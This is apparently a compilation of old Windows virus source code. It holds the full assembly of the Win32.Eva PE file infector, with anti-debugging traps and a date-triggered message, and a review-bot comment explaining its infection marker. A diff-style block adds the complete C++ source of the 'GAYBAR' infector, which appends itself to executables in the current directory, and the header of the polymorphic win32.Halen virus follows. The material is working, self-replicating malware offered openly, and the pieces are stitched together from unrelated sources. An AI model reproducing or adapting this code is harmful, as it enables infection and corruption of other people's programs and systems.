;Eva is one pretty girl with nice black/red hair and lovely eyes.
;I hope, that this work (fully programmed and commented by three days - good
;motivation :-)) will say some words to Eva better than I X-DD. I hate myself.
;
;
;Last notes
;-----------
;
;This virus has many bugs (after many repairs without tests) and in this time, I don't care
;about it. Don't bitch if, that it doesn't work and look at my last viruses... Hey, it's my first
;virus, so gimme space for living X-D.
;
;
;And here is it...
.386p ;386 instructions
.model flat ;32bit offset, no segments
include PE.inc ;include some needed files
include MZ.inc
include Useful.inc
include win32api.inc
extrn FindFirstFileA:PROC ;and import needed APIs
extrn SetFileAttributesA:PROC
extrn CreateFileA:PROC
extrn CreateFileMappingA:PROC
extrn MapViewOfFile:PROC
extrn UnmapViewOfFile:PROC
extrn CloseHandle:PROC
extrn FindClose:PROC
extrn FindNextFileA:PROC
extrn CopyFileA:PROC
extrn GetCommandLineA:PROC
extrn CreateProcessA:PROC
extrn GetModuleFileNameA:PROC
extrn WaitForSingleObject:PROC
extrn DeleteFileA:PROC
extrn GetCurrentDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetVersion:PROC
extrn GetSystemTime:PROC
extrn MessageBoxA:PROC
extrn GetLastError:PROC
extrn GetModuleHandleA:PROC
extrn GetProcAddress:PROC
extrn SetFilePointer:PROC
extrn SetEndOfFile:PROC
.data ;data section
msgTitle db 'Win32.Eva by Benny, (c) 1999', 0
msgText db 'Hello stupid user, i''m so sorry, but i have to interrupt your work,', 0dh
db '''cause I hate this shitty program. Click OK to continue.', 0dh, 0dh
db 'Greets to:', 0dh
db 9, 'Super/29A', 0dh
db 9, 'Darkman/29A', 0dh
db 9, 'Jacky Qwerty/29A', 0dh
db 9, 'Billy Belcebu/DDT', 0dh, 0dh
db 9, 'and many other 29Aers...', 0dh, 0dh, 0
kernel db 'KERNEL32', 0
IsDebuggerPresent db 'IsDebuggerPresent', 0
fmask db '*.EXE',0 ;search mask
DestFile db 'aaaaeva.exe', 0 ;temporary file
org $ - 1
space db ? ;space between name and params
CmdLine db 256 - 12 dup (?) ;command line
win32_find_data WIN32_FIND_DATA ?
search_handle dd ?
hFile dd ?
hMyFile dd ?
hMapFile dd ?
hMyMapFile dd ?
lpFile dd ?
lpMyFile dd ?
lppiProcInfo: ;needed by CreateProcessA
hProcess dd ?
hThread dd ?
dwProcessID dd ?
dwThreadID dd ?
lpFileName db 256 dup (?)
lpsiStartInfo db 64 dup (?)
lpWindowsPath db 256 dup (?)
lpCurrentPath db 256 dup (?)
org lpCurrentPath
lpSystemTime db 16 dup (?) ;these variables may overlap
ends
.code ;code of virus starts here
Start:
pushad
pushad
@SEH_SetupFrame ;setup SEH frame
inc dword ptr [edx] ;bye TD32 !
db 2dh ;some prefix
seh_rs:
push 256
push offset lpFileName
push 0
call GetModuleFileNameA ;get file-name of me
test_dir: ;i wont infect files in Windows
;dir, 'cause NT could crash
;on start
mov esi, offset lpCurrentPath
push esi
push esi
push 256
call GetCurrentDirectoryA ;get current directory
pop ebx
push 256
mov edi, offset lpWindowsPath
push edi
call GetWindowsDirectoryA ;getwindows directory
N_Char: cmpsb ;compare
jpatch: jne NoMatch ;no match, jump
jne FindFile ;second jump for next test
cmp byte ptr [esi - 1], 0 ;end of string ?
jne N_Char ;no, get next char
jmp quit_to_host ;yeah, we're in Windows dir.,
;jump to host
db 68h ;some prefix
NoMatch:push 256
mov edi, offset lpWindowsPath
push edi
call GetSystemDirectoryA ;get windows system dir.
mov word ptr [jpatch], 9090h ;path first jump with NOPs,
;second will take effect
mov esi, ebx
jmp N_Char ;and test directory
db 8bh ;some prefix
FindFile:
push offset win32_find_data
push offset fmask
call FindFirstFileA ;find first file
test eax, eax
je exit_search ;no files, quit
mov search_handle, eax ;save search handle
try_infect:
cmp win32_find_data.WFD_nFileSizeHigh, 0 ;discard huge files
jne Try_Next
mov eax, [win32_find_data.WFD_nFileSizeLow]
cmp eax, 4096*4 ;discard small files
jb Try_Next
cmp eax, (64*64*512)+1 ;discard huge files
jb @1
Try_Next:
push offset win32_find_data
push [search_handle]
call FindNextFileA ;try next file
xchg eax, ecx
jecxz exit_search ;no files, quit
jmp try_infect ;try infect it
db 67h ;some prefix
@1: mov edx, offset win32_find_data.WFD_szFileName
push edx
push 0
push edx
call SetFileAttributesA ;black file attributes
pop edx
xchg eax, ecx
jecxz Try_Next ;can't set attributes, try next
call OpenFile ;open and map file
jecxz Try_Next ;cant map file, try next
call InfectFile ;infect file
cmp eax, 'EVA' ;infection OK ?
je exit_search ;no, try next
push [lpFile]
call UnmapViewOfFile ;unmap view of file
push [hMapFile]
call CloseHandle ;close file mapping object
;error, we MUST TRUNCATE FILE BACK !
push 0
push 0
push [win32_find_data.WFD_nFileSizeLow]
push [hFile]
call SetFilePointer ;set file pointer to original size
push [hFile]
call SetEndOfFile ;and truncate file
call end_OpenFile3 ;close file
jmp Try_Next ;try next file
exit_search:
call CloseFile ;close and unmap file
call MyClose ;close and unmap my file
push [win32_find_data.WFD_dwFileAttributes]
push offset win32_find_data.WFD_szFileName
call SetFileAttributesA ;set back file attributes
push [search_handle]
call FindClose ;close search handle
quit_to_host:
push offset lpSystemTime ;test for activate payload
call GetSystemTime ;get system time
push 2
pop ecx ;ecx = 2
cmp word ptr [lpSystemTime+2], cx ;is February ?
jne no_payload
cmp word ptr [lpSystemTime+6], cx ;is 2nd of February
jne no_payload
cmp word ptr [lpSystemTime+12], cx ;2 seconds ?
jne no_payload
push 1000h ;system modal window
push offset msgTitle ;title
push offset msgText ;test
push 0 ;owner - NULL
call MessageBoxA ;display bessage box
no_payload:
push 0 ;overwrite file, if exist already
push offset DestFile ;destination file
cpyf: push offset lpFileName ;source file
call CopyFileA ;copy file
test eax, eax ;error ? (disk full, for example)
jne getcommandline
call GetLastError ;get las error
cmp eax, 32 ;another process is using this file
jne exit ;unknown error, exit
push 0 ;everwrite file
mov edx, offset DestFile ;dest. file
inc dword ptr [edx] ;try generate another file
push edx
jmp cpyf ;and try to copy file again
db 8bh ;some prefix
getcommandline: ;now we will skip our filename
call GetCommandLineA ;get command line
mov esi, eax ;set source
cat: lodsb ;get char
cmp al, 0 ;no params ?
je run_prg
cmp al, '"' ;long files r written with ""s
je long_name
cmp al, 20h ;is it space ?
jne cat
cat1: mov edi, offset CmdLine ;destination
lodsb ;movsb with char in al
stosb
cmp al, 0 ;end of params ?
je run_prg
cat0: lodsb ;same as previous
stosb
cmp al, 0
jne cat0
run_prg:
mov edx, offset DestFile ;edx as file to param
mov win32_find_data.WFD_nFileSizeLow, 2048 ;save num. of bytes to map
call OpenFile ;open and map our file
jecxz end_host ;if error, quit
mov eax, [ecx.MZ_lfanew - 4] ;load oroginal MZ_lfanew
mov [ecx.MZ_lfanew], eax ;and save it to that original pos.
call CloseFile ;close and unmap file
mov [space], 20h ;add params
xor eax, eax
push offset lppiProcInfo ;procinfo
push offset lpsiStartInfo ;start info
mov [lpsiStartInfo], SIZE lpsiStartInfo ;size of start info
push eax ;directory
push eax ;enviroment
push eax ;create options
push eax ;inherit handles ?
push eax ;thread SA
push eax ;process SA
push offset DestFile ;command line
push eax ;app name
call CreateProcessA ;create process !
xchg eax, ecx
jecxz end_host ;if error, quit
push -1 ;infinite
push [hProcess] ;child process
call WaitForSingleObject ;wait for signaled state
push [hThread]
call CloseHandle ;close thread primary thread handle
push [hProcess]
call CloseHandle ;close process handle
end_host:
mov edi, offset DestFile
push edi ;file to delete
mov byte ptr [edi+space-DestFile], 0 ;add NULL between file and params
call DeleteFileA ;delete it !
exit: popad ;restore all registers
ret ;otherwise this quit metod will not work !
db 75h ;some prefix
long_name:
lodsb ;load char
cmp al, '"'
jne long_name ;wait for next "
jmp cat1
db 73h ;some prefix
InfectFile proc
mov ebx, ecx ;save address of MM-file
cmp word ptr [ecx], IMAGE_DOS_SIGNATURE ;must be MZ
jne end_InfectFile
cmp dword ptr [ecx.MZ_lfanew-4], 0 ;mustn't be infected already
jne end_InfectFile
mov edx, [ecx.MZ_lfanew]
add ecx, edx
cmp dword ptr [ecx], IMAGE_NT_SIGNATURE ;must be PE\0\0
jne end_InfectFile
cmp word ptr [ecx.NT_FileHeader.FH_Machine], IMAGE_FILE_MACHINE_I386 ;must be 386+
jne end_InfectFile
movzx eax, word ptr [ecx.NT_FileHeader.FH_Characteristics]
not al
test eax, IMAGE_FILE_EXECUTABLE_IMAGE or IMAGE_FILE_DLL
jne end_InfectFile ;must be executable, mustn't be DLL
;at this point:
; EBX - start of MM-file
; ECX - PE header of MM-file
mov ebp, ebx
mov edi, ecx
sub edi, ebx
mov [ebx.MZ_lfanew-4], edi ;save original MZ_lfanew
mov eax, win32_find_data.WFD_nFileSizeLow
mov [ebx.MZ_lfanew], eax
mov edi, ebx
add edi, eax
mov edx, [ebx.MZ_lfanew]
add edx, ebx
push edx ;push it, will be needed l8r
call MyOpen ;open and map me
pop edx
jecxz end_InfectFile ;can't open, quit
push edx
mov esi, [ecx.MZ_lfanew]
add esi, ecx
push ecx
mov ecx, (503) / 4 ;PE header size + section header size
cld
rep movsd ;copy PE header + all section headers
pop esi
pop edx
;at this point:
; EDX - start of our new PE header
; EBP - start of MM-file (MZ header)
; ESI - start of MM prg+virus (MZ header)
; EDI - pointer to memory, where will be copied virus sections
push ebp
;from ...
mov ecx, [esi.MZ_lfanew]
add ecx, esi
movzx ebx, word ptr [ecx.NT_FileHeader.FH_SizeOfOptionalHeader] ;size of optional header
;to ...
mov ebp, edx
movzx edx, word ptr [edx.NT_FileHeader.FH_SizeOfOptionalHeader] ; ...
mov eax, 4 ;number of sections
copy_sections:
pushad
pushad
call Align ;align position
mov [esp.Pushad_edi], edi
popad
;from ...
lea ebx, [ecx.NT_OptionalHeader + ebx]
add esi, [ebx.SH_PointerToRawData] ;address of section data
mov ecx, [ebx.SH_SizeOfRawData] ;size of section data
;to ...
lea edx, [ebp.NT_OptionalHeader + edx]
mov ebx, edi
sub ebx, [esp.cPushad.RetAddr]
mov [edx.SH_PointerToRawData], ebx ;save pointer
rep movsb
mov [esp.Pushad_edi], edi
popad
sub ebx, -IMAGE_SIZEOF_SECTION_HEADER ;next section
sub edx, -IMAGE_SIZEOF_SECTION_HEADER ;next section
dec eax
jne copy_sections
pop ebp
mov eax, 'EVA' ;success, toggle flag
end_InfectFile:
ret
InfectFile EndP
db 72h ;some prefix
Align Proc
mov eax, edi
mov ebx, 200h ;our align
AlignIt:xor edx, edx ;nulify idiv remaider
push eax
idiv ebx ;divide it !
pop eax
test edx, edx ;mod = 0 ?
je end_align ;yeah, align complete
inc eax ;no, increment address
jmp AlignIt ;and jump back
end_align:
mov edi, eax ;edi = new aligned address
ret
Align EndP
db 75h ;some prefix
MyOpen proc
cdq ;edx = 0
push edx ;hTemlate
push edx ;normal attributes
push OPEN_EXISTING ;creation options
push edx ;SA
push FILE_SHARE_READ or FILE_SHARE_WRITE ;share mode
push GENERIC_READ ;desired access
push offset lpFileName ;lpFileName
call CreateFileA ;open it !
inc eax ;eax = -1 ?
je end_MyOpen3
dec eax
mov hMyFile, eax ;save handle
mov esi, eax
cdq ;edx = 0
push edx ;lpszMapName
push edx ;max. size low
push edx ;max. size high
push PAGE_READONLY ;fdwProtect
push edx ;SA
push esi ;hFile
call CreateFileMappingA ;create mapping !
xchg eax, ecx
jecxz end_MyOpen2 ;eax = 0 ?
mov hMyMapFile, ecx ;save handle
xor eax, eax ;eax = 0
push eax ;bytes to map
push eax ;offset low
push eax ;offset high
push FILE_MAP_READ ;dwDesiredAccess
push ecx ;hMapObj
call MapViewOfFile ;map it !
mov lpMyFile, eax ;save handle
xchg eax, ecx ;ret. value in ecx
ret
db 76h ;some prefix
MyClose:
push [lpMyFile]
call UnmapViewOfFile ;close mapped file
end_MyOpen2:
push [hMyMapFile]
call CloseHandle ;close mapping
end_MyOpen3:
push [hMyFile]
call CloseHandle ;close file
xor ecx, ecx
ret
MyOpen EndP
db 75h ;some prefix
;same as previous
OpenFile proc
xor eax, eax
push eax
push eax
push OPEN_EXISTING
push eax
mov al, 1
push eax
ror eax, 1
rcr eax, 1
push eax
push edx
call CreateFileA
cdq
inc eax
je end_OpenFile3
dec eax
mov hFile, eax
push edx
mov esi, win32_find_data.WFD_nFileSizeLow
sub esi, -4096
push esi
push edx
push PAGE_READWRITE
push 0
push eax
call CreateFileMappingA
cdq
xchg eax, ecx
jecxz end_OpenFile2
mov hMapFile, ecx
push esi
push edx
push edx
push FILE_MAP_WRITE
push ecx
call MapViewOfFile
mov lpFile, eax
xchg eax, ecx
ret
db 76h ;some prefix
CloseFile:
push [lpFile]
call UnmapViewOfFile
end_OpenFile2:
push [hMapFile]
call CloseHandle
end_OpenFile3:
push [hFile]
call CloseHandle
xor ecx, ecx
ret
OpenFile EndP
db 77h ;some prefix
seh_fn:
@SEH_RemoveFrame ;remove SEH frame
popad ;restore regs
call GetVersion ;get windows version
cmp eax, 80000000h ;is it WinNT ?
jb NT_debug_trap ;yeah, freeze this app
cmp ax, 0a04h ;or Win98
jb no_debug_trap ;Win95-
debug_trap: ;Win95/98
call IsDebugger
mov eax, 909119cdh ;set some instructions
jmp $ - 4 ;say bye to your balls :-)
db 2dh ;some prefix
no_debug_trap:
jmp seh_rs ;jump back
db 2dh ;some prefix
NT_debug_trap:
call IsDebugger
xor esp, esp ;this will freeze our app
push ecx ;if not, this will cause
;access violation exception
IsDebugger:
pop ebx
push offset kernel
call GetModuleHandleA ;get memory address of kernel32
xchg eax, ecx
jecxz no_debug_trap ;error, jump
push offset IsDebuggerPresent
push ecx
call GetProcAddress ;get procedure address of our API
xchg eax, ecx
jecxz no_debug_trap
call ecx ;call IsDebuggerPresent
xchg eax, ecx
jecxz no_debug_trap
jmp ebx
ends
End Start
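Review bot: Neither the header comment nor `InfectFile` documents the infection marker and the recovery field the code relies on, which is the one fact a disinfection routine needs. `InfectFile` rejects files whose dword at `[ecx.MZ_lfanew-4]` is non-zero, then stores the original `MZ_lfanew` into that same dword (`mov [ebx.MZ_lfanew-4], edi`) before redirecting `MZ_lfanew` at the appended PE header, and `run_prg` restores the host by copying it back (`mov eax, [ecx.MZ_lfanew - 4]` / `mov [ecx.MZ_lfanew], eax`). A comment at the top of `InfectFile` would make this explicit, e.g. `; Marker: dword at MZ_lfanew-4 != 0 means already infected; it holds the original MZ_lfanew, which restores the host`. The build notes should also mention that `mov word ptr [jpatch], 9090h` writes into the code section at run time, which is presumably why the `pewrsec` step is listed; a reader otherwise has no hint that the image needs a writable code section.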
+420
@@ -0,0 +1,420 @@
/*
Welcome to the GAYBAR§§§ (from ikx industries)
-================================================-
Technically, this virus has nothing new. It's a very old school virus that appends
its code to the last section and modifies the entry point in the PE header. It
browses the import table in order to find the kernel address and imports APIs by CRC.
The virus is about 1200 bytes long. It's a bit big for a virus of this kind and it
requires some optimization. The main idea is that it was written in 100% c++ to take
advantage of the use of classes. No assembly file or special linking is needed. It
does everything just as a standard assembly virus would do. It has no need for
relocation; it can use global pointers and ignores the delta pointer problem. It was
compiled using Visual Studio Architect. Just remove the "Buffer Security Check" and
put it in release mode. (Dont forget to put size optimization). It also seems to work
with Visual Studio 6.0.
But, all is not pink in this happy world. There are a few problems. You can't use any
strings inside the executable. I reconstructed the strings by dropping values into
buffers as a meta virus would do. (int k[0] = 'xe.*') We are seeking how to solve
this problem in a better way. Also, it's not really 100% c++ as it still has a stub
loader that will call the virus body. This part is in assembly and consists of a few
pushes and a call. This virus might be "portable" to other platforms as long as you
remedy the stub problem.
The point of this virus is to pimp people to the c++ side. A virus can be done within
a reasonable size using c++, doing almost as well as an assembly virus. I hope this
creates a new era with future babies coming along.
Greets to:
Vorgon: You are god, i bow down before you oh master dark lord of VX. My Hero!
Lifewire: to have pimped me to the c++ side, for the original idea as well as the
the motivation
UnderX: to be the 1st to listen to my bragging description
Griyo: who was the second
Cecile: Damn, I like you, wanted to dedicate this virus to you but I preferred the
GAYBAR! jtm
Morphine: for correcting my english! 10x0r!
Welcome to the GAYBAR !!
*/
#include "stdio.h"
#include "windows.h"
#include "PE.hpp"
typedef void* __stdcall iGetModuleHandle(char*);
typedef void* __stdcall iLoadLibraryA(char*);
typedef HANDLE __stdcall iFindFirstFileA(void*,LPWIN32_FIND_DATA);
typedef bool __stdcall iFindNextFileA(HANDLE,LPWIN32_FIND_DATA);
typedef void __stdcall iOutputDebugStringA(char*);
typedef HANDLE __stdcall iCreateFileA(char*,DWORD,DWORD,DWORD,DWORD,DWORD,HANDLE);
typedef HANDLE __stdcall iCreateFileMappingA(HANDLE,DWORD,DWORD,DWORD,DWORD,char*);
typedef void* __stdcall iMapViewOfFile(HANDLE,DWORD,DWORD,DWORD,DWORD);
typedef void __stdcall iUnmapViewOfFile(void*);
typedef void __stdcall iCloseHandle(HANDLE);
typedef DWORD __stdcall iGetFileSize(HANDLE, int);
#define LoadLibraryACrc 0x660E91B6
#define FindFirstFileACrc 0xFACA6F2D
#define FindNextFileACrc 0x47F9DA21
#define OutputDebugStringACrc 0xFBDF28B7
#define CreateFileACrc 0x8DC85CF9
#define CreateFileMappingACrc 0xA3A46E23
#define MapViewOfFileCrc 0x505C8F3F
#define UnmapViewOfFileCrc 0x5239B6AF
#define CloseHandleCrc 0x4E1ED759
#define GetFileSizeCrc 0xC37E2502
#define vir_size (((int) main - 0x00401000))
void __stdcall start(void *ImageBase, void *viruslocation);
int main(int argc, char **argv);
int iround(int a, int b) { return ((a / b)+1)* b; }
// Dumb crc routine, it isn't really crc, less powerful but it's sufficient for
// apiname checking.
DWORD GetAPICrc(char *name)
{
DWORD k = 0;
for(int i = 0; name[i] != 0; i++)
k = (k << 3) + (k >> (sizeof(k) -3)) + name[i];
return k;
}
class virus
{
public:
//
// Api finder, you specify the Address base of the PE and the crc
// of the address and it will return the address to you. If it fails, it
// returns 0 and sets a global flag called missed
//
void *GetProcAddressCrc(char *ModuleBase, DWORD APICrc)
{
PE_STRUCT *PEheaderBase = (PE_STRUCT *) (ModuleBase + ((DWORD *) (ModuleBase+0x3C))[0]);
PE_EXPORT_STRUCT *ExportTable = (PE_EXPORT_STRUCT *) ( ModuleBase + PEheaderBase->pe_exportrva);
if(PEheaderBase->pe_exportrva != 0)
{
// Here you get all the pointers, so once it's found, you only have to
// grab the data from the table once
DWORD* NameTable = (DWORD *) (ModuleBase + ExportTable->ex_namepointersrva);
WORD* Ordinaltable = (WORD *) (ModuleBase + ExportTable->ex_ordinaltablerva);
DWORD* AddressTable = (DWORD *) (ModuleBase + ExportTable->ex_addresstablerva);
for(int i = 0; i < ExportTable->ex_numofnamepointers; i++)
{
if(GetAPICrc((char *) ModuleBase+NameTable[i]) == APICrc)
return ModuleBase+AddressTable[Ordinaltable[i]];
}
}
missed = true;
return 0;
}
// Linked chain
struct NameList
{
NameList *Previous;
void *location;
};
//
// Find the Kernel32 address by browsing the Import Table. It searches for
// "KERNEL32". If the library isn't KERNEL32, it browses the import
// table of the library. This is done by using a recursive function. It
// scans the import table and imports the table of imported libraries, and
// etc. But, It could cycle :( What if user32.dll points to advapi.dll
// and advapi.dll points to user32.dll? It would cycle infinitly.
//
// I stored a list of already scanned libraries (NameList). Before scanning
// sub libraries, it checks if the libary hasn't been scanned yet.
//
void *GetK32Address(char *PEImageBase, NameList *List = 0)
{
PE_STRUCT *PEheaderBase = (PE_STRUCT *) (PEImageBase + ((DWORD *) (PEImageBase+0x3C))[0]);
PE_IMPORT_STRUCT *ImportTable = (PE_IMPORT_STRUCT *) (PEImageBase + PEheaderBase->pe_importrva);
if(PEheaderBase->pe_importrva != 0)
{
char* LibName; // we will scan every name
while(PEImageBase + ImportTable->im_name)
{
LibName = PEImageBase + ImportTable->im_name;
// gets the base address of the library
WORD **apitable = (WORD **) ((char*) PEImageBase + ImportTable->im_addresstable);
WORD *location = (WORD *) ((char *) apitable[0] - ((WORD *) apitable)[0]);
while( location[0] != 'ZM') location = (WORD *) ((char*) location - 0x1000);
// it isn't the kernel ?
if(! ((((DWORD *) LibName)[0] == 'NREK') && (((DWORD *) LibName)[1] == '23LE')))
{
bool dosearch = true;
NameList *item = List;
while(item != 0 && dosearch) // have we searched
{ // this library ?
if(location == item->location) dosearch = false;
item = item->Previous;
}
if(dosearch) // if not, it adds the name to the list
{ // and scans this library
NameList newitem = { List, location };
void *retaddr = GetK32Address((char *)location, &newitem);
if(retaddr != 0) return retaddr;
}
}
else return location;
ImportTable = (PE_IMPORT_STRUCT *) ((char *) ImportTable + sizeof(PE_IMPORT_STRUCT));
}
}
return 0;
}
//
// Searches all the needed api, starting by retrieving kernel32 address
// from current process import table, if it's found, import all apis. If an
// api is missed, bool missed has been set to true and it will return false
//
bool Import(void *PEImageBase)
{
char *K32Address = (char *) GetK32Address((char *) PEImageBase);
missed = false;
if(K32Address)
{
LoadLibraryA = (iLoadLibraryA *) GetProcAddressCrc( K32Address, LoadLibraryACrc);
FindFirstFileA = (iFindFirstFileA *) GetProcAddressCrc( K32Address, FindFirstFileACrc);
FindNextFileA = (iFindNextFileA *) GetProcAddressCrc( K32Address, FindNextFileACrc);
OutputDebugStringA = (iOutputDebugStringA *) GetProcAddressCrc( K32Address, OutputDebugStringACrc);
CreateFileA = (iCreateFileA *) GetProcAddressCrc( K32Address, CreateFileACrc);
CreateFileMappingA = (iCreateFileMappingA *) GetProcAddressCrc( K32Address, CreateFileMappingACrc);
MapViewOfFile = (iMapViewOfFile *) GetProcAddressCrc( K32Address, MapViewOfFileCrc);
UnmapViewOfFile = (iUnmapViewOfFile *) GetProcAddressCrc( K32Address, UnmapViewOfFileCrc);
CloseHandle = (iCloseHandle *) GetProcAddressCrc( K32Address, CloseHandleCrc);
GetFileSize = (iGetFileSize *) GetProcAddressCrc( K32Address, GetFileSizeCrc);
}
return (K32Address && !missed);
}
//
// Remap the file and in the same way resize the file
//
void Remap(int newsize)
{
UnmapViewOfFile(MapAddress);
CloseHandle(FileMapping);
FileMapping = CreateFileMapping(File,NULL, PAGE_READWRITE, 0, newsize, 0 );
MapAddress = (char *) MapViewOfFile( FileMapping, FILE_MAP_ALL_ACCESS, 0, 0, newsize);
}
// drop a push instruction to a memory location
void createpush(char *location, int value)
{
(location)[0] = (char) 0x68;
((int *)(location+1))[0] = value;
}
// We got the file maped at (MapAddress), we are going to infect
// that file
void ProcessInfection()
{
// check if exe
if( ((WORD *) MapAddress)[0] == 'ZM' )
{
PE_STRUCT *PEheaderBase = (PE_STRUCT *) (MapAddress + ((DWORD *) (MapAddress+0x3C))[0]);
// check if PE
if( ((DWORD *) PEheaderBase)[0] == 'EP' )
{
// get lastsection offset
PE_OBJENTRY_STRUCT *lastsection = (PE_OBJENTRY_STRUCT *)
((char *) PEheaderBase + sizeof(PE_STRUCT) +
(PEheaderBase->pe_numofobjects - 1) * sizeof(PE_OBJENTRY_STRUCT));
// save information, later we will need to return to host
// viruspos will be a working variable for now
int old_entrypoint = PEheaderBase->pe_entrypointrva + PEheaderBase->pe_imagebase;
int viruspos = max(lastsection->oe_physsize, lastsection->oe_virtsize);
// change last section size in physical and memory, change
// his permission
lastsection->oe_physsize = iround( viruspos+vir_size, PEheaderBase->pe_filealign);
lastsection->oe_virtsize = iround( viruspos+vir_size, PEheaderBase->pe_objectalign);
lastsection->oe_objectflags |= IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ;
// set new entry point
PEheaderBase->pe_entrypointrva = viruspos + lastsection->oe_virtrva;
int new_entrypoint = PEheaderBase->pe_entrypointrva + PEheaderBase->pe_imagebase;
int old_imagebase = PEheaderBase->pe_imagebase;
// viruspost is now the position where we should drop virus
viruspos += lastsection->oe_physoffs;
// recalculate PE size in memory
PEheaderBase->pe_imagesize = lastsection->oe_virtrva + lastsection->oe_virtsize;
// resize file
Remap(iround(lastsection->oe_physoffs + lastsection->oe_physsize, 128) + 69 );
char *virusdest = MapAddress + viruspos;
// we are dropping the stub loader
// we will push on stack old entrypoint
// two next value will be forwarded to virus
createpush(virusdest, old_entrypoint);
createpush(virusdest+5, new_entrypoint+21);
createpush(virusdest+10, old_imagebase);
// drop call to virus
(virusdest+15)[0] = (char) 0xE8;
((int *)(virusdest+16))[0] = ((int) start - 0x00401000)+1;
// then ret, who will jump to host
(virusdest+20)[0] = (char) 0xC3;
virusdest += 21;
// drop virus here (memcpy didnt worked :()
for(int i = 0; i < vir_size; i++)
(virusdest++)[0] = ((char *) VirCode)[i];
// drop virus copyright :)
((__int64*) virusdest)[0] = 0x20656D6F636C6557;
((__int64*) virusdest)[1] = 0x4720656874206F74;
((__int64*) virusdest)[2] = 0x2020215241425941;
((__int64*) virusdest)[3] = 0x334B325D584B495B;
}
}
}
// This function basically opens a file specified in input
// then maps it. If mapping succeed and finally it ask to
// ProcessInfection()
void infect(char *filename)
{
File = CreateFileA(filename, GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
if( File != INVALID_HANDLE_VALUE )
{
int FileSize = GetFileSize(File,0);
FileMapping = CreateFileMapping(File,NULL,PAGE_READWRITE,
0, FileSize, 0 );
if( FileMapping != INVALID_HANDLE_VALUE )
{
MapAddress = (char *) MapViewOfFile( FileMapping,
FILE_MAP_ALL_ACCESS, 0, 0, FileSize);
if(MapAddress != 0)
{
ProcessInfection();
UnmapViewOfFile(MapAddress);
}
CloseHandle(FileMapping);
}
CloseHandle(File);
}
}
// The real entry point of the virus. Here, we manipulate everything
// inside the object. It just searches for various *.exe inside the
// current directory
void start_virus(void *PEBase, void *VirusCode)
{
if(Import(PEBase))
{
WIN32_FIND_DATA datas;
HANDLE fileresult;
VirCode = VirusCode;
char trashbuffer[8];
// search for *.exe
((__int64 *) trashbuffer)[0] = 0x06578652E2A;
fileresult = FindFirstFileA(trashbuffer, &datas);
if(fileresult != INVALID_HANDLE_VALUE) do
{
if( (datas.nFileSizeLow % 128) != 69)
infect(datas.cFileName);
}
while(FindNextFile(fileresult, &datas));
}
}
/*
* The Api Table
*
******************/
iLoadLibraryA* LoadLibraryA;
iFindFirstFileA* FindFirstFileA;
iFindNextFileA* FindNextFileA;
iOutputDebugStringA* OutputDebugStringA;
iCreateFileA* CreateFileA;
iCreateFileMappingA* CreateFileMappingA;
iMapViewOfFile* MapViewOfFile;
iUnmapViewOfFile* UnmapViewOfFile;
iCloseHandle* CloseHandle;
iGetFileSize* GetFileSize;
// functions
bool missed;
HANDLE File;
HANDLE FileMapping;
char *MapAddress;
void *VirCode;
};
// This creates an instance of object virus on the stack, and then calls the
// virus. The global variable inside the class will be taken from the stack
// and not from data
void __stdcall start(void *ImageBase, void *viruslocation)
{
virus A;
A.start_virus(ImageBase, viruslocation);
}
// this will fake the stub loader and call our virus
int main(int argc, char **argv)
{
int k = vir_size;
start((void*) 0x00400000, (void *) 0x00401000);
printf("welcome to the Gaybar: %i\n", k);
return 0;
}
+961
@@ -0,0 +1,961 @@
; win32.Halen virus
; (C)reated by pxR[MIONS]
; January 2k+1 ł
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄŮ
;
;
; Uvodem
; ÄÄÄÄÄÄŮ
;Dovolte me abych vam predstavil jeden z mych lame viru :) (muj prvni pod win)
;Tohle je win32 nerezidentrni PE infektor - prilepi se na konec PE souboru
;(zvetseni posledni sekce). Je to kodovanej virus jakymsi shit poly algoritmem :),
;kterej jsem tak nejak narychlo sepsal. Kazdou sobotu v 19:xx (nebo 20:xx podle
;rocniho obdobi ;) to zobrazi dialog a po jeho potvrzeni to zacne odsouvat obraz
;doprava se zmenou pozadi.
;
; Jak kompilovat?
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄŮ
; tasm32 /m3 /ml Halen.asm,,;
; tlink32 /Tpe /aa Halen,Halen,,import32.lib
; pewrsec Halen.exe
;
;
; Par slov o tom, jak funguje ten poly shit (nic zajimavyho!):
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄŮ
;de/en crypt rutina je tvorena nahodne generovanymi instrukcemi ADD, SUB, XOR, ROR a
;ROL.
;
;Na zacatku decrypt rutiny jsou vzdy istrukce:
;CALL 0000000; POP EDI; ADD EDI,xxxxxxxx; MOV ESI,EDI; XOR EBP,EBP; CLD; LODSD;
;
;Na konci decrypt rutiny jsou vzdy istrukce:
;STOSD; INC EBP,xxxx; CMP EBP,xxxx; JNE xxxxxxxx
;
;Encrypt rutina vypada jinak. Neobsahuje uvodni (init) instrukce (CALL az LOSDS) a
;koncove instrukce (STOSD az JNE). Na jejim konci je RET. Pri kodovani pak vlozime
;do EAX hodnotu, kterou chceme zakodovat, provedeme CALL na tuto rutinu a obdrzime
;v EAX zakodovanou hodnotu.
;
;Registr, se kterym jsou provadeny instrukce ADD az ROL (pracovni registr) je volen
;nahodne a muze byt uvnitr de/en crypt rutiny kdykoliv menen. Vybira se z
;registru EAX az EDX.
;
;Nejdrive se vygeneruji data pro de/en crypt rutinu.
;napr:
; 87D0 82EAC28F 81C2EADC7143A0 87C9C990 C0C9C187 ...... 87C1
; ^zmena prac. registru
;Na zacatku a na koci dat jsou vzdy 2 byty - instrukce XCHG prac.reg.,EAX (zacatek) a
;XCHG EAX,prac.reg. (konec). Jsou nutne k provadeni instrukci LODSD a STOSD.
;Po pocatecnim XCHG (2 byty) zacinaji vlastni data. 1. byte specifikuje instrukci
;dale nasleduje 2 byty, ktere specifikuji registr, ktery se pouzije. Jeden byte pro
;decrypt a druhy pro encrypt rutinu (pouzije se vzdy jen jeden podle toho, jakou
;rutinu chceme vygenerovat). Dale uz nasleduji data (1 nebo 4 byty - zalezi na
;instrukci).
;
